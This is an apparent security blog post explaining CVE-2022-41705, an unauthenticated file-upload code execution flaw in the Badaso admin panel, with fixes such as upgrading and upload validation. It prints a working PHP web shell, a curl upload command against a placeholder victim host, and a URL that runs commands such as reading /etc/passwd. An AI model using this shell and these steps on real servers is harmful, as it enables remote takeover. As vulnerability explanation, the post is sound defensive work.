CVE-2022-41705 - Remote Code Execution in Badaso v2.6.3 Explained (How Attackers Exploit File Uploads)

If you use Badaso—the Laravel-based admin panel—especially version 2.6.3 or earlier, you need to know about CVE-2022-41705. This critical vulnerability lets a remote attacker—without logging in—run any code they want on your server. In this post, I’ll walk you through how this works, what the exploit might look like, and how you can fix it.

What Is CVE-2022-41705?

Badaso lets users (admin or otherwise) upload files to your server with little to no validation. That means an attacker can upload files like PHP scripts, which the server may then accidentally execute.

In simple terms:
*Someone can upload a hidden backdoor or script, then visit it and control part of your server.*

Upload a Malicious File:

Instead of uploading a harmless image, they upload a file like shell.php—a tiny script that gives full control.

3. Access/Execute the Uploaded File:
By browsing to the uploaded file (like mysite.com/uploads/shell.php), the attacker can send commands to your server.

Example Code Snippet: Malicious Upload

Here’s an example of a classic PHP web shell an attacker might upload (never use this on a real site):

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
}
?>

This tiny script will run whatever command gets passed via the cmd parameter (like ls, cat /etc/passwd, etc.).

Exploit Example: How an Attacker Does It

Let’s say the upload endpoint is /api/upload.

Using curl

curl -F "file=@shell.php" https://victim.com/api/upload

If the upload folder is /uploads, attacker tries

https://victim.com/uploads/shell.php

Step 3: Run a server command via the shell

https://victim.com/uploads/shell.php?cmd=whoami

This will display the user account running the server.

Official Sources & References

- CVE-2022-41705 on NIST
- Badaso’s GitHub
- Original advisory

How Can You Fix This?

1. Update Badaso
Patch immediately! Developers released new versions fixing this issue.

2. Block PHP Uploads
Only allow safe file types (like .jpg, .png). Block all scripts.

Example code in Laravel for stricter validation

$request->validate([
    'file' => 'required|mimes:jpg,jpeg,png,pdf|max:2048'
]);

3. Store Uploads Outside Web Root
Move uploads to a folder that web servers can’t access directly.

4. Authenticate Uploads
Require users to log in before uploading files.

Summary

CVE-2022-41705 is dangerous because it doesn’t require a password or any access. Anyone can upload PHP code and hijack your server. Upgrade Badaso, validate uploads, and check your site right away.

Timeline

Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/30/2022 16:08:00 UTC